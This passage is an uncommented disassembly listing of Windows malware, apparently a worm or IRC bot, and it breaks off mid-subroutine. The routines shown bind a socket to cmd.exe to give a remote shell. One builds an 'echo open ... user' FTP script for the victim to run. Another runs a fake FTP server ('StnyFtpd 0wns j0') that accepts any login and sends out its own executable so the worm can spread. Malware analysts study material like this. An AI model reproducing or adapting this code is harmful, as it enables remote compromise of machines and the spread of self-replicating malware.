jnz short loc_4114C2
mov eax, [esp+0B4h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_4114C4
; ---------------------------------------------------------------------------
loc_4114C2: ; CODE XREF: .text:004114A9�j
xor eax, eax
loc_4114C4: ; CODE XREF: .text:004114C0�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4114C7 proc near ; DATA XREF: sub_411555+158�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_4114D0: ; CODE XREF: sub_4114C7+25�j
; sub_4114C7+41�j
push 0
push 400h
lea eax, [ebp+var_404]
push eax
push dword_4D5250
call dword_444064 ; recv
test eax, eax
jle short loc_4114D0
push 0
lea ecx, [ebp+var_4]
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push dword_4D5248
call ds:dword_42B084 ; WriteFile
jmp short loc_4114D0
sub_4114C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41150A proc near ; DATA XREF: sub_411555+13F�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_411513: ; CODE XREF: sub_41150A+2F�j
; sub_41150A+49�j
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push 400h
lea eax, [ebp+var_404]
push eax
push dword_4D524C
call ds:dword_42B080 ; ReadFile
cmp [ebp+var_4], 0
jle short loc_411513
push 0
push [ebp+var_4]
lea eax, [ebp+var_404]
push eax
push dword_4D5250
call dword_4441A0 ; send
jmp short loc_411513
sub_41150A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_411555 proc near ; DATA XREF: sub_40274D+2AF2�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
Dst = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor esi, esi
inc esi
push 10h ; Size
mov [eax+98h], esi
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+var_98]
mov [ebp+Dst], 2
call dword_444260 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call dword_444100 ; socket
mov [ebp+arg_0], eax
push 10h
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4441E4 ; bind
push 5
push [ebp+arg_0]
call dword_444230 ; listen
mov ebx, ds:dword_42B0A0
mov esi, ds:dword_42B004
loc_4115D5: ; CODE XREF: sub_411555+1C8�j
push edi
push edi
push [ebp+arg_0]
call dword_4440BC ; accept
push edi
mov dword_4D5250, eax
lea eax, [ebp+var_C]
push eax
push offset dword_4D5248
push offset dword_4D5244
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
push edi
lea eax, [ebp+var_C]
push eax
push offset dword_4D5254
push offset dword_4D524C
call ebx ; CreatePipe
push 44h ; Size
lea eax, [ebp+var_7C]
push edi ; Val
push eax ; Dst
call _memset
mov eax, dword_4D5244
add esp, 0Ch
push edi
mov [ebp+var_44], eax
mov eax, dword_4D5254
push 1
mov [ebp+var_40], eax
push 2
lea eax, [ebp+var_3C]
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call ds:dword_42B09C ; GetCurrentProcess
push eax
push dword_4D5254
call ds:dword_42B09C ; GetCurrentProcess
push eax
call ds:dword_42B098 ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
push 1
lea eax, [ebp+var_C]
push eax
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_42B008 ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_41150A
push edi
lea eax, [ebp+var_C]
push eax
call ds:dword_42B03C ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_4114C7
push edi
lea eax, [ebp+var_C]
push eax
call ds:dword_42B03C ; CreateThread
push 0FFFFFFFFh
push [ebp+var_28]
mov [ebp+var_10], eax
call ds:dword_42B054 ; WaitForSingleObject
push edi
push [ebp+var_10]
call ds:dword_42B028 ; TerminateThread
push edi
push [ebp+var_14]
call ds:dword_42B028 ; TerminateThread
push [ebp+var_10]
call esi ; CloseHandle
push [ebp+var_14]
call esi ; CloseHandle
push edi
push [ebp+var_28]
call ds:dword_42B094 ; TerminateProcess
push dword_4D5244
call esi ; CloseHandle
push dword_4D5248
call esi ; CloseHandle
push dword_4D524C
call esi ; CloseHandle
push dword_4D5254
call esi ; CloseHandle
push [ebp+var_24]
call esi ; CloseHandle
push [ebp+var_28]
call esi ; CloseHandle
jmp loc_4115D5
sub_411555 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411722 proc near ; DATA XREF: sub_40B690+352�o
Str = byte ptr -6C0h
Dest = byte ptr -2C0h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 6C0h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 27h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_C0]
rep movsd
xor esi, esi
inc esi
push 10h ; Size
mov [eax+98h], esi
xor ebx, ebx
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_B4]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push ebx
push esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], ebx
call dword_444100 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_4117D6
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_434054 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_2C], ebx
jnz short loc_4117BA
push ebx ; int
push [ebp+74h+var_30] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_C0] ; int
call sub_40123B
add esp, 14h
loc_4117BA: ; CODE XREF: sub_411722+7C�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_BC]
call sub_40B149
pop ecx
pop ecx
push ebx
jmp loc_4119F9
; ---------------------------------------------------------------------------
loc_4117D6: ; CODE XREF: sub_411722+5C�j
mov eax, [ebp+74h+var_BC]
imul eax, 234h
mov dword_4444F4[eax], edi
push 10h
lea eax, [ebp+74h+Dst]
push eax
push edi
call dword_4441E4 ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_4118E7
call dword_4441C4 ; WSAGetLastError
cmp eax, 2740h
jz short loc_41185E
push eax
lea eax, [ebp+74h+Dest]
push offset asc_434018 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+74h+var_2C], esi
jnz short loc_411842
push esi ; int
push [ebp+74h+var_30] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_C0] ; int
call sub_40123B
add esp, 14h
loc_411842: ; CODE XREF: sub_411722+104�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_BC]
call sub_40B149
pop ecx
pop ecx
push esi
jmp loc_4119F9
; ---------------------------------------------------------------------------
loc_41185E: ; CODE XREF: sub_411722+E8�j
push 0FFFEh
push ebx
call sub_41B325
pop ecx
pop ecx
mov dword_4D525C, eax
mov [ebp+74h+var_12], ax
push 10h
lea eax, [ebp+74h+Dst]
push eax
push edi
call dword_4441E4 ; bind
cmp eax, esi
jnz short loc_4118E7
call dword_4441C4 ; WSAGetLastError
mov esi, eax
push esi
lea eax, [ebp+74h+Dest]
push offset asc_434018 ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 0Ch
cmp [ebp+74h+var_2C], edi
jnz short loc_4118CB
cmp esi, 2740h
jz short loc_4118CB
push edi ; int
push [ebp+74h+var_30] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_C0] ; int
call sub_40123B
add esp, 14h
loc_4118CB: ; CODE XREF: sub_411722+185�j
; sub_411722+18D�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_BC]
call sub_40B149
pop ecx
pop ecx
push edi
jmp loc_4119F9
; ---------------------------------------------------------------------------
loc_4118E7: ; CODE XREF: sub_411722+D7�j
; sub_411722+161�j
push 5
push edi
call dword_444230 ; listen
cmp eax, esi
jz loc_4119E7
mov [ebp+74h+var_4], 10h
mov esi, offset aWindows_exe ; "windows.exe"
loc_411904: ; CODE XREF: sub_411722+1F7�j
; sub_411722+264�j ...
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+74h+arg_0], eax
jz short loc_411904
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Dest]
push offset asc_433FE0 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+74h+var_2C], 0
jnz short loc_41195F
push 0 ; int
push [ebp+74h+var_30] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_C0] ; int
call sub_40123B
add esp, 14h
loc_41195F: ; CODE XREF: sub_411722+220�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
push 0
push 200h
lea eax, [ebp+74h+Dest]
push eax
push [ebp+74h+arg_0]
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz loc_411904
push esi
push esi
push dword_4D1FE4
push [ebp+74h+var_C0]
call sub_4023C9
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+74h+Str]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+74h+Str]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+74h+Str]
push eax
push [ebp+74h+arg_0]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_411904
inc dword_4D5258
jmp loc_411904
; ---------------------------------------------------------------------------
loc_4119E7: ; CODE XREF: sub_411722+1D0�j
push edi
call dword_444218 ; closesocket
push [ebp+74h+var_BC]
call sub_40B149
pop ecx
push 0
loc_4119F9: ; CODE XREF: sub_411722+AF�j
; sub_411722+137�j ...
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_411722 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A00 proc near ; CODE XREF: sub_411B17+4D2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_42B204 ; WSAStartup
push 0
push 1
push 2
call ds:dword_42B20C ; socket
push [ebp+arg_0]
mov dword_4D5260, eax
mov [ebp+var_10], 2
call ds:dword_42B218 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_42B200 ; htons
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_4D5260
call ds:dword_42B1F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_411A78
push dword_4D5260
call ds:dword_42B1F8 ; closesocket
call ds:dword_42B1FC ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_411A78: ; CODE XREF: sub_411A00+60�j
xor eax, eax
inc eax
leave
retn
sub_411A00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A7D proc near ; CODE XREF: sub_411B17:loc_41203C�p
DstBuf = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax ; char *
call _fopen
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_411B14
test byte ptr [esi+0Ch], 10h
jnz short loc_411AF8
push edi
mov edi, 400h
loc_411AC0: ; CODE XREF: sub_411A7D+78�j
push esi ; File
push 1 ; Count
lea eax, [ebp+DstBuf]
push edi ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
push 0
push edi
lea eax, [ebp+DstBuf]
push eax
push dword_4D5260
call ds:dword_42B210 ; send
push 1
call ds:dword_42B014 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_411AC0
pop edi
loc_411AF8: ; CODE XREF: sub_411A7D+3B�j
push esi ; File
call _fclose
pop ecx
push dword_4D5260
call ds:dword_42B1F8 ; closesocket
call ds:dword_42B1FC ; WSACleanup
xor eax, eax
inc eax
loc_411B14: ; CODE XREF: sub_411A7D+35�j
pop esi
leave
retn
sub_411A7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411B17 proc near ; DATA XREF: sub_40B690+22B�o
var_A70 = byte ptr -0A70h
var_8E0 = dword ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
Dst = byte ptr -2A0h
var_23C = byte ptr -23Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
Str = byte ptr -128h
Dest = byte ptr -0FCh
var_C8 = byte ptr -0C8h
Str1 = byte ptr -0B0h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A70h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6E0]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A70]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_2C], ebx
mov [ebp+74h+var_24], ebx
mov [ebp+74h+var_22C], esi
mov [ebp+74h+var_43C], esi
call ds:dword_42B204 ; WSAStartup
push esi
push ebx
push 2
call ds:dword_42B20C ; socket
mov esi, ds:dword_42B1E0
push 4
lea ecx, [ebp+74h+var_1C]
push ecx
push 4
mov edi, 0FFFFh
push edi
push eax
mov [ebp+74h+var_8], eax
call esi ; setsockopt
push 4
lea eax, [ebp+74h+var_2C]
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+74h+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+74h+var_24]
push eax
push 8004667Eh
push edi
call ds:dword_42B1E4 ; ioctlsocket
and [ebp+74h+var_48], 0
xor eax, eax
mov ax, word ptr dword_4D1FE4
mov [ebp+74h+var_4C], 2
push eax
call dword_444260 ; htons
mov [ebp+74h+var_4A], ax
push 10h
lea eax, [ebp+74h+var_4C]
push eax
push edi
call ds:dword_42B1E8 ; bind
test eax, eax
jl loc_412129
push 0Ah
push edi
call ds:dword_42B1EC ; listen
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_43C]
push eax
mov eax, [ebp+74h+var_8]
mov [ebp+74h+var_228], edi
mov [ebp+74h+var_4], edi
inc eax
lea esi, [ebp+74h+var_22C]
lea edi, [ebp+74h+var_43C]
mov [ebp+74h+var_22C], ebx
push eax
rep movsd
call ds:dword_42B21C ; select
cmp eax, 0FFFFFFFFh
jz loc_412129
mov ebx, ds:dword_42B210
loc_411C2D: ; CODE XREF: sub_411B17+609�j
xor edi, edi
cmp [ebp+74h+var_4], edi
mov [ebp+74h+arg_0], edi
jl loc_4120F5
loc_411C3B: ; CODE XREF: sub_411B17+5D8�j
push 64h ; Size
lea eax, [ebp+74h+Dst]
push 0 ; Val
push eax ; Dst
call _memset
push 64h ; Size
xor esi, esi
lea eax, [ebp+74h+Str1]
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+74h+var_43C]
push eax
push edi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jz loc_4120E8
cmp edi, [ebp+74h+var_8]
jnz short loc_411CE2
lea eax, [ebp+74h+var_10]
push eax
lea eax, [ebp+74h+var_23C]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_10], 10h
call ds:dword_42B1F0 ; accept
cmp eax, 0FFFFFFFFh
jz loc_4120E8
mov edx, [ebp+74h+var_22C]
xor ecx, ecx
cmp edx, esi
jbe short loc_411CB4
loc_411CA6: ; CODE XREF: sub_411B17+19B�j
cmp [ebp+ecx*4+74h+var_228], eax
jz short loc_411CB4
inc ecx
cmp ecx, edx
jb short loc_411CA6
loc_411CB4: ; CODE XREF: sub_411B17+18D�j
; sub_411B17+196�j
cmp ecx, edx
jnz short loc_411CCA
cmp edx, 40h
jnb short loc_411CCA
mov [ebp+ecx*4+74h+var_228], eax
inc [ebp+74h+var_22C]
loc_411CCA: ; CODE XREF: sub_411B17+19F�j
; sub_411B17+1A4�j
cmp eax, [ebp+74h+var_4]
jle short loc_411CD2
mov [ebp+74h+var_4], eax
loc_411CD2: ; CODE XREF: sub_411B17+1B6�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_4120E8
; ---------------------------------------------------------------------------
loc_411CE2: ; CODE XREF: sub_411B17+15D�j
push esi
push 64h
lea eax, [ebp+74h+Dst]
push eax
push edi
call ds:dword_42B208 ; recv
test eax, eax
jg short loc_411D3F
mov ecx, [ebp+74h+var_22C]
xor eax, eax
cmp ecx, esi
jbe short loc_411D33
loc_411D03: ; CODE XREF: sub_411B17+1F8�j
cmp [ebp+eax*4+74h+var_228], edi
jz short loc_411D28
inc eax
cmp eax, ecx
jb short loc_411D03
jmp short loc_411D33
; ---------------------------------------------------------------------------
loc_411D13: ; CODE XREF: sub_411B17+214�j
mov ecx, [ebp+eax*4+74h+var_224]
mov [ebp+eax*4+74h+var_228], ecx
mov ecx, [ebp+74h+var_22C]
inc eax
loc_411D28: ; CODE XREF: sub_411B17+1F3�j
dec ecx
cmp eax, ecx
jb short loc_411D13
dec [ebp+74h+var_22C]
loc_411D33: ; CODE XREF: sub_411B17+1EA�j
; sub_411B17+1FA�j
push edi
call ds:dword_42B1F8 ; closesocket
jmp loc_4120E8
; ---------------------------------------------------------------------------
loc_411D3F: ; CODE XREF: sub_411B17+1DE�j
lea eax, [ebp+74h+var_338]
push eax
lea eax, [ebp+74h+Str1]
push eax
lea eax, [ebp+74h+Dst]
push offset aSS_3 ; "%s %s"
push eax ; Src
call _sscanf
lea eax, [ebp+74h+Str1]
push offset aUser_1 ; "USER"
push eax ; Str1
call _strcmp
add esp, 18h
test eax, eax
jnz short loc_411D7D
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411D7D: ; CODE XREF: sub_411B17+257�j
lea eax, [ebp+74h+Str1]
push offset aPass_0 ; "PASS"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411D9E
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411D9E: ; CODE XREF: sub_411B17+278�j
lea eax, [ebp+74h+Str1]
push offset aSyst ; "SYST"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411DBF
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411DBF: ; CODE XREF: sub_411B17+299�j
lea eax, [ebp+74h+Str1]
push offset aRest ; "REST"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411DE0
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411DE0: ; CODE XREF: sub_411B17+2BA�j
lea eax, [ebp+74h+Str1]
push offset off_43426C ; Str2
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411E01
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411E01: ; CODE XREF: sub_411B17+2DB�j
lea eax, [ebp+74h+Str1]
push offset aType ; "TYPE"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411E39
lea eax, [ebp+74h+var_338]
push offset aA_0 ; "A"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411E39
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411E39: ; CODE XREF: sub_411B17+2FC�j
; sub_411B17+313�j
lea eax, [ebp+74h+Str1]
push offset aType ; "TYPE"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411E71
lea eax, [ebp+74h+var_338]
push offset aI_0 ; "I"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411E71
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411E71: ; CODE XREF: sub_411B17+334�j
; sub_411B17+34B�j
lea eax, [ebp+74h+Str1]
push offset aPasv ; "PASV"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411EBC
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+Str]
rep movsd
push eax
lea eax, [ebp+74h+Str]
push eax ; Str
movsw
call _strlen
pop ecx
push eax
lea eax, [ebp+74h+Str]
loc_411EAC: ; CODE XREF: sub_411B17+3D8�j
push eax
push [ebp+74h+arg_0]
call ebx ; send
mov edi, [ebp+74h+arg_0]
xor esi, esi
jmp loc_4120D6
; ---------------------------------------------------------------------------
loc_411EBC: ; CODE XREF: sub_411B17+36C�j
lea eax, [ebp+74h+Str1]
push offset aList_0 ; "LIST"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_411EF1
push 5
pop ecx
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+74h+var_C8]
push eax ; Str
movsb
call _strlen
pop ecx
push eax
lea eax, [ebp+74h+var_C8]
jmp short loc_411EAC
; ---------------------------------------------------------------------------
loc_411EF1: ; CODE XREF: sub_411B17+3B7�j
lea eax, [ebp+74h+Str1]
push offset aPort ; "PORT"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_411FBF
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+Dest]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_18]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+Dst]
push offset aS_2 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax ; Src
call _sscanf
lea eax, [ebp+74h+Dest]
push eax ; Str
call j__atol
mov [ebp+74h+var_C], eax
lea eax, [ebp+74h+var_2D4]
push eax ; Str
call j__atol
push 32h ; Size
mov [ebp+74h+arg_0], eax
lea eax, [ebp+74h+Dest]
push esi ; Val
push eax ; Dst
call _memset
push [ebp+74h+arg_0]
lea eax, [ebp+74h+Dest]
push [ebp+74h+var_C]
push offset aXX ; "%x%x\n"
push eax ; Dest
call _sprintf
add esp, 44h
push 10h ; Radix
lea eax, [ebp+74h+Dest]
push esi ; EndPtr
push eax ; Str
call _strtoul
mov [ebp+74h+var_C], eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_18]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_3C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax ; Dest
call _sprintf
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_4120D3
; ---------------------------------------------------------------------------
loc_411FBF: ; CODE XREF: sub_411B17+3EC�j
lea eax, [ebp+74h+Str1]
push offset aRetr ; "RETR"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4120B7
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_3C]
push eax
call sub_411A00
cmp eax, 1
pop ecx
pop ecx
jnz loc_4120AD
lea eax, [ebp+74h+var_3C]
push eax
lea eax, [ebp+74h+var_8E0]
push offset asc_434104 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_444], esi
jnz short loc_41203C
push esi ; int
push [ebp+74h+var_448] ; int
lea eax, [ebp+74h+var_8E0]
push eax ; int
lea eax, [ebp+74h+var_4C8]
push eax ; Str
push [ebp+74h+var_6E0] ; int
call sub_40123B
add esp, 14h
loc_41203C: ; CODE XREF: sub_411B17+500�j
call sub_411A7D
cmp eax, 1
jnz loc_4120D6
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+74h+var_3C]
push eax
lea eax, [ebp+74h+var_8E0]
push offset asc_4340D0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_444], esi
jnz short loc_412098
push esi ; int
push [ebp+74h+var_448] ; int
lea eax, [ebp+74h+var_8E0]
push eax ; int
lea eax, [ebp+74h+var_4C8]
push eax ; Str
push [ebp+74h+var_6E0] ; int
call sub_40123B
add esp, 14h
loc_412098: ; CODE XREF: sub_411B17+55C�j
lea eax, [ebp+74h+var_8E0]
push eax
call sub_417D70
inc dword_4D400C
pop ecx
jmp short loc_4120D6
; ---------------------------------------------------------------------------
loc_4120AD: ; CODE XREF: sub_411B17+4DC�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_4120D3
; ---------------------------------------------------------------------------
loc_4120B7: ; CODE XREF: sub_411B17+4BA�j
lea eax, [ebp+74h+Str1]
push offset aQuit ; "QUIT"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4120D6
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_4120D3: ; CODE XREF: sub_411B17+261�j
; sub_411B17+282�j ...
push edi
call ebx ; send
loc_4120D6: ; CODE XREF: sub_411B17+3A0�j
; sub_411B17+52D�j ...
push 64h ; Size
lea eax, [ebp+74h+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_4120E8: ; CODE XREF: sub_411B17+154�j
; sub_411B17+17D�j ...
inc edi
cmp edi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], edi
jle loc_411C3B
loc_4120F5: ; CODE XREF: sub_411B17+11E�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_43C]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_22C]
lea edi, [ebp+74h+var_43C]
push eax
rep movsd
call ds:dword_42B21C ; select
cmp eax, 0FFFFFFFFh
jnz loc_411C2D
xor ebx, ebx
inc ebx
loc_412129: ; CODE XREF: sub_411B17+C1�j
; sub_411B17+10A�j
pop edi
pop esi
mov eax, ebx
pop ebx
add ebp, 74h
leave
retn 4
sub_411B17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_412135(int,int,int,char *Source)
sub_412135 proc near ; CODE XREF: sub_40274D+73A7�p
; sub_4129C2+143�p
Dst = byte ptr -598h
